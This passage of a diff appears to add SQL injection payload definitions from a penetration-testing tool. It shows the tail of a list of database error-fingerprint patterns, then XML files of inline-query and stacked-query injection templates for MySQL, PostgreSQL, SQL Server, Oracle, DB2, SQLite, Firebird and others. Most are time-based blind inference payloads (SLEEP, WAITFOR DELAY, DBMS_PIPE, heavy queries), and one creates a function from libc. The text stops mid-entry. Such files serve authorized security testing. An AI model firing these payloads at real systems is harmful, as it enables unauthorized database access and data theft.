+        <error regexp="![0-9]{5}![^\n]+(failed|unexpected|error|syntax|expected|violation|exception)"/>
+        <error regexp="\[MonetDB\]\[ODBC Driver"/>
+        <error regexp="nl\.cwi\.monetdb\.jdbc"/>
+    </dbms>
+
+    <dbms value="Apache Derby">
+        <error regexp="Syntax error: Encountered"/>
+        <error regexp="org\.apache\.derby"/>
+        <error regexp="ERROR 42X01"/>
+    </dbms>
+
+    <dbms value="Vertica">
+        <error regexp=", Sqlstate: (3F|42).{3}, (Routine|Hint|Position):"/>
+        <error regexp="/vertica/Parser/scan"/>
+        <error regexp="com\.vertica\.jdbc"/>
+        <error regexp="org\.jkiss\.dbeaver\.ext\.vertica"/>
+        <error regexp="com\.vertica\.dsi\.dataengine"/>
+    </dbms>
+
+    <dbms value="Mckoi">
+        <error regexp="com\.mckoi\.JDBCDriver"/>
+        <error regexp="com\.mckoi\.database\.jdbc"/>
+        <error regexp="&lt;REGEX_LITERAL&gt;"/>
+    </dbms>
+
+    <dbms value="Presto">
+        <error regexp="com\.facebook\.presto\.jdbc"/>
+        <error regexp="io\.prestosql\.jdbc"/>
+        <error regexp="com\.simba\.presto\.jdbc"/>
+        <error regexp="UNION query has different number of fields: \d+, \d+"/>
+        <error regexp="line \d+:\d+: mismatched input '[^']+'. Expecting:"/>
+    </dbms>
+
+    <dbms value="Altibase">
+        <error regexp="Altibase\.jdbc\.driver"/>
+    </dbms>
+
+    <dbms value="MimerSQL">
+        <error regexp="com\.mimer\.jdbc"/>
+        <error regexp="Syntax error,[^\n]+assumed to mean"/>
+    </dbms>
+
+    <dbms value="ClickHouse">
+        <error regexp="Code: \d+. DB::Exception:"/>
+        <error regexp="Syntax error: failed at position \d+"/>
+    </dbms>
+
+    <dbms value="CrateDB">
+        <error regexp="io\.crate\.client\.jdbc"/>
+    </dbms>
+
+    <dbms value="Cache">
+        <error regexp="encountered after end of query"/>
+        <error regexp="A comparison operator is required here"/>
+    </dbms>
+
+    <dbms value="Raima Database Manager">
+        <error regexp="-10048: Syntax error"/>
+        <error regexp="rdmStmtPrepare\(.+?\) returned"/>
+    </dbms>
+
+    <dbms value="Virtuoso">
+        <error regexp="SQ074: Line \d+:"/>
+        <error regexp="SR185: Undefined procedure"/>
+        <error regexp="SQ200: No table "/>
+        <error regexp="Virtuoso S0002 Error"/>
+        <error regexp="\[(Virtuoso Driver|Virtuoso iODBC Driver)\]\[Virtuoso Server\]"/>
+    </dbms>
+</root>

data/xml/payloads/inline_query.xml

@@ -0,0 +1,157 @@
+<?xml version="1.0" encoding="UTF-8"?>
+
+<root>
+    <!-- Inline queries tests -->
+    <test>
+        <title>Generic inline queries</title>
+        <stype>3</stype>
+        <level>1</level>
+        <risk>1</risk>
+        <clause>1,2,3,8</clause>
+        <where>3</where>
+        <vector>(SELECT CONCAT(CONCAT('[DELIMITER_START]',([QUERY])),'[DELIMITER_STOP]'))</vector>
+        <request>
+            <payload>(SELECT CONCAT(CONCAT('[DELIMITER_START]',(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)),'[DELIMITER_STOP]'))</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+    </test>
+
+    <test>
+        <title>MySQL inline queries</title>
+        <stype>3</stype>
+        <level>2</level>
+        <risk>1</risk>
+        <clause>1,2,3,8</clause>
+        <where>3</where>
+        <vector>(SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))</vector>
+        <request>
+            <payload>(SELECT CONCAT('[DELIMITER_START]',(ELT([RANDNUM]=[RANDNUM],1)),'[DELIMITER_STOP]'))</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>PostgreSQL inline queries</title>
+        <stype>3</stype>
+        <level>2</level>
+        <risk>1</risk>
+        <clause>1,2,3,8</clause>
+        <where>3</where>
+        <vector>(SELECT '[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]')</vector>
+        <request>
+            <payload>(SELECT '[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]')</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Microsoft SQL Server/Sybase inline queries</title>
+        <stype>3</stype>
+        <level>2</level>
+        <risk>1</risk>
+        <clause>1,2,3,8</clause>
+        <where>3</where>
+        <vector>(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')</vector>
+        <request>
+            <payload>(SELECT '[DELIMITER_START]'+(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)+'[DELIMITER_STOP]')</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>Microsoft SQL Server</dbms>
+            <dbms>Sybase</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle inline queries</title>
+        <stype>3</stype>
+        <level>2</level>
+        <risk>1</risk>
+        <clause>1,2,3,8</clause>
+        <where>3</where>
+        <vector>(SELECT ('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') FROM DUAL)</vector>
+        <request>
+            <!-- NOTE: Vertica works too without the TO_NUMBER() -->
+            <payload>(SELECT '[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN TO_NUMBER(1) ELSE TO_NUMBER(0) END)||'[DELIMITER_STOP]' FROM DUAL)</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>SQLite inline queries</title>
+        <stype>3</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,2,3,8</clause>
+        <where>3</where>
+        <vector>SELECT '[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]'</vector>
+        <request>
+            <payload>SELECT '[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)||'[DELIMITER_STOP]'</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>SQLite</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Firebird inline queries</title>
+        <stype>3</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,2,3,8</clause>
+        <where>3</where>
+        <vector>SELECT '[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]' FROM RDB$DATABASE</vector>
+        <request>
+            <payload>SELECT '[DELIMITER_START]'||(CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END)||'[DELIMITER_STOP]' FROM RDB$DATABASE</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>Firebird</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>ClickHouse inline queries</title>
+        <stype>3</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,2,3,8</clause>
+        <where>3</where>
+        <vector>('[DELIMITER_START]'||CAST(([QUERY]) AS String)||'[DELIMITER_STOP]')</vector>
+        <request>
+            <payload>('[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)||'[DELIMITER_STOP]')</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>ClickHouse</dbms>
+        </details>
+    </test>
+    
+    <!-- End of inline queries tests -->
+</root>

data/xml/payloads/stacked_queries.xml

@@ -0,0 +1,730 @@
+<?xml version="1.0" encoding="UTF-8"?>
+
+<root>
+    <!-- Stacked queries tests -->
+    <test>
+        <title>MySQL &gt;= 5.0.12 stacked queries (comment)</title>
+        <stype>4</stype>
+        <level>2</level>
+        <risk>1</risk>
+        <clause>1-8</clause>
+        <where>1</where>
+        <vector>;SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
+        <request>
+            <payload>;SELECT SLEEP([SLEEPTIME])</payload>
+            <comment>#</comment>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.0.12</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &gt;= 5.0.12 stacked queries</title>
+        <stype>4</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1-8</clause>
+        <where>1</where>
+        <vector>;SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
+        <request>
+            <payload>;SELECT SLEEP([SLEEPTIME])</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.0.12</dbms_version>
+        </details>
+    </test>
+
+     <test>
+        <title>MySQL &gt;= 5.0.12 stacked queries (query SLEEP - comment)</title>
+        <stype>4</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1-8</clause>
+        <where>1</where>
+        <vector>;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
+        <request>
+            <payload>;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
+            <comment>#</comment>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.0.12</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &gt;= 5.0.12 stacked queries (query SLEEP)</title>
+        <stype>4</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>1-8</clause>
+        <where>1</where>
+        <vector>;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
+        <request>
+            <payload>;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.0.12</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &lt; 5.0.12 stacked queries (BENCHMARK - comment)</title>
+        <stype>4</stype>
+        <level>3</level>
+        <risk>2</risk>
+        <clause>1-8</clause>
+        <where>1</where>
+        <vector>;SELECT IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
+        <request>
+            <payload>;SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))</payload>
+            <comment>#</comment>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>MySQL &lt; 5.0.12 stacked queries (BENCHMARK)</title>
+        <stype>4</stype>
+        <level>5</level>
+        <risk>2</risk>
+        <clause>1-8</clause>
+        <where>1</where>
+        <vector>;SELECT IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
+        <request>
+            <payload>;SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>PostgreSQL &gt; 8.1 stacked queries (comment)</title>
+        <stype>4</stype>
+        <level>1</level>
+        <risk>1</risk>
+        <clause>1-8</clause>
+        <where>1</where>
+        <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>;SELECT PG_SLEEP([SLEEPTIME])</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+            <dbms_version>&gt; 8.1</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>PostgreSQL &gt; 8.1 stacked queries</title>
+        <stype>4</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>1-8</clause>
+        <where>1</where>
+        <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>;SELECT PG_SLEEP([SLEEPTIME])</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+            <dbms_version>&gt; 8.1</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>PostgreSQL stacked queries (heavy query - comment)</title>
+        <stype>4</stype>
+        <level>2</level>
+        <risk>2</risk>
+        <clause>1-8</clause>
+        <where>1</where>
+        <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>;SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>PostgreSQL stacked queries (heavy query)</title>
+        <stype>4</stype>
+        <level>5</level>
+        <risk>2</risk>
+        <clause>1-8</clause>
+        <where>1</where>
+        <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>;SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>PostgreSQL &lt; 8.2 stacked queries (Glibc - comment)</title>
+        <stype>4</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1-8</clause>
+        <where>1</where>
+        <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>;CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep([SLEEPTIME])</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+            <dbms_version>&lt; 8.2</dbms_version>
+            <os>Linux</os>
+        </details>
+    </test>
+
+    <test>
+        <title>PostgreSQL &lt; 8.2 stacked queries (Glibc)</title>
+        <stype>4</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>1-8</clause>
+        <where>1</where>
+        <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>;CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep([SLEEPTIME])</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+            <dbms_version>&lt; 8.2</dbms_version>
+            <os>Linux</os>
+        </details>
+    </test>
+
+    <test>
+        <title>Microsoft SQL Server/Sybase stacked queries (comment)</title>
+        <stype>4</stype>
+        <level>1</level>
+        <risk>1</risk>
+        <clause>1-8</clause>
+        <where>1</where>
+        <vector>;IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'</vector>
+        <request>
+            <payload>;WAITFOR DELAY '0:0:[SLEEPTIME]'</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>Microsoft SQL Server</dbms>
+            <dbms>Sybase</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Microsoft SQL Server/Sybase stacked queries (DECLARE - comment)</title>
+        <stype>4</stype>
+        <level>2</level>
+        <risk>1</risk>
+        <clause>1-8</clause>
+        <where>1</where>
+        <vector>;DECLARE @x CHAR(9);SET @x=0x303a303a3[SLEEPTIME];IF([INFERENCE]) WAITFOR DELAY @x</vector>
+        <request>
+            <payload>;DECLARE @x CHAR(9);SET @x=0x303a303a3[SLEEPTIME];WAITFOR DELAY @x</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>Microsoft SQL Server</dbms>
+            <dbms>Sybase</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Microsoft SQL Server/Sybase stacked queries</title>
+        <stype>4</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>1-8</clause>
+        <where>1</where>
+        <vector>;IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'</vector>
+        <request>
+            <payload>;WAITFOR DELAY '0:0:[SLEEPTIME]'</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>Microsoft SQL Server</dbms>
+            <dbms>Sybase</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Microsoft SQL Server/Sybase stacked queries (DECLARE)</title>
+        <stype>4</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>1-8</clause>
+        <where>1</where>
+        <vector>;DECLARE @x CHAR(9);SET @x=0x303a303a3[SLEEPTIME];IF([INFERENCE]) WAITFOR DELAY @x</vector>
+        <request>
+            <payload>;DECLARE @x CHAR(9);SET @x=0x303a303a3[SLEEPTIME];WAITFOR DELAY @x</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>Microsoft SQL Server</dbms>
+            <dbms>Sybase</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)</title>
+        <stype>4</stype>
+        <level>1</level>
+        <risk>1</risk>
+        <clause>1-8</clause>
+        <where>1</where>
+        <vector>;SELECT CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END FROM DUAL</vector>
+        <request>
+            <payload>;SELECT DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) FROM DUAL</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE)</title>
+        <stype>4</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>1-8</clause>
+        <where>1</where>
+        <vector>;SELECT CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END FROM DUAL</vector>
+        <request>
+            <payload>;SELECT DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) FROM DUAL</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle stacked queries (heavy query - comment)</title>
+        <stype>4</stype>
+        <level>2</level>
+        <risk>2</risk>
+        <clause>1-8</clause>
+        <where>1</where>
+        <vector>;SELECT CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END FROM DUAL</vector>
+        <request>
+            <payload>;SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle stacked queries (heavy query)</title>
+        <stype>4</stype>
+        <level>5</level>
+        <risk>2</risk>
+        <clause>1-8</clause>
+        <where>1</where>
+        <vector>;SELECT CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END FROM DUAL</vector>
+        <request>
+            <payload>;SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle stacked queries (DBMS_LOCK.SLEEP - comment)</title>
+        <stype>4</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>1-8</clause>
+        <where>1</where>
+        <vector>;BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END</vector>
+        <request>
+            <payload>;BEGIN DBMS_LOCK.SLEEP([SLEEPTIME]); END</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle stacked queries (DBMS_LOCK.SLEEP)</title>
+        <stype>4</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>1-8</clause>
+        <where>1</where>
+        <vector>;BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END</vector>
+        <request>
+            <payload>;BEGIN DBMS_LOCK.SLEEP([SLEEPTIME]); END</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle stacked queries (USER_LOCK.SLEEP - comment)</title>
+        <stype>4</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>1-8</clause>
+        <where>1</where>
+        <vector>;BEGIN IF ([INFERENCE]) THEN USER_LOCK.SLEEP([SLEEPTIME]); ELSE USER_LOCK.SLEEP(0); END IF; END</vector>
+        <request>
+            <payload>;BEGIN USER_LOCK.SLEEP([SLEEPTIME]); END</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Oracle stacked queries (USER_LOCK.SLEEP)</title>
+        <stype>4</stype>
+        <level>5</level>
+        <risk>1</risk>
+        <clause>1-8</clause>
+        <where>1</where>
+        <vector>;BEGIN IF ([INFERENCE]) THEN USER_LOCK.SLEEP([SLEEPTIME]); ELSE USER_LOCK.SLEEP(0); END IF; END</vector>
+        <request>
+            <payload>;BEGIN USER_LOCK.SLEEP([SLEEPTIME]); END</payload>
+        </request>
+        <response>
+            <time>[SLEEPTIME]</time>
+        </response>
+        <details>
+            <dbms>Oracle</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>IBM DB2 stacked queries (heavy query - comment)</title>
+        <stype>4</stype>
+        <level>3</level>
+        <risk>2</risk>
+        <clause>1-8</clause>
+        <where>1</where>
+        <vector>;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE])</vector>
+        <request>
+            <payload>;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>IBM DB2</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>IBM DB2 stacked queries (heavy query)</title>
+        <stype>4</stype>
+        <level>5</level>
+        <risk>2</risk>
+        <clause>1-8</clause>
+        <where>1</where>
+        <vector>;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE])</vector>
+        <request>
+            <payload>;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>IBM DB2</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>SQLite &gt; 2.0 stacked queries (heavy query - comment)</title>
+        <stype>4</stype>
+        <level>3</level>
+        <risk>2</risk>
+        <clause>1-8</clause>
+        <where>1</where>
+        <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>;SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>SQLite</dbms>
+            <dbms_version>&gt; 2.0</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>SQLite &gt; 2.0 stacked queries (heavy query)</title>
+        <stype>4</stype>
+        <level>5</level>
+        <risk>2</risk>
+        <clause>1-8</clause>
+        <where>1</where>
+        <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>
+        <request>
+            <payload>;SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>SQLite</dbms>
+            <dbms_version>&gt; 2.0</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>Firebird stacked queries (heavy query - comment)</title>
+        <stype>4</stype>
+        <level>4</level>
+        <risk>2</risk>
+        <clause>1-8</clause>
+        <where>1</where>
+        <vector>;SELECT IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) FROM RDB$DATABASE</vector>
+        <request>
+            <payload>;SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>Firebird</dbms>
+            <dbms_version>&gt;= 2.0</dbms_version>
+        </details>
+    </test>
+    
+    <test>
+        <title>Firebird stacked queries (heavy query)</title>
+        <stype>4</stype>
+        <level>5</level>
+        <risk>2</risk>
+        <clause>1-8</clause>
+        <where>1</where>
+        <vector>;SELECT IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) FROM RDB$DATABASE</vector>
+        <request>
+            <payload>;SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>Firebird</dbms>
+            <dbms_version>&gt;= 2.0</dbms_version>
+        </details>
+    </test>
+
+    <test>
+        <title>SAP MaxDB stacked queries (heavy query - comment)</title>
+        <stype>4</stype>
+        <level>4</level>
+        <risk>2</risk>
+        <clause>1-8</clause>
+        <where>1</where>
+        <vector>;SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3</vector>
+        <request>
+            <payload>;SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3</payload>
+            <comment>--</comment>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>SAP MaxDB</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>SAP MaxDB stacked queries (heavy query)</title>
+        <stype>4</stype>
+        <level>5</level>
+        <risk>2</risk>
+        <clause>1-8</clause>
+        <where>1</where>
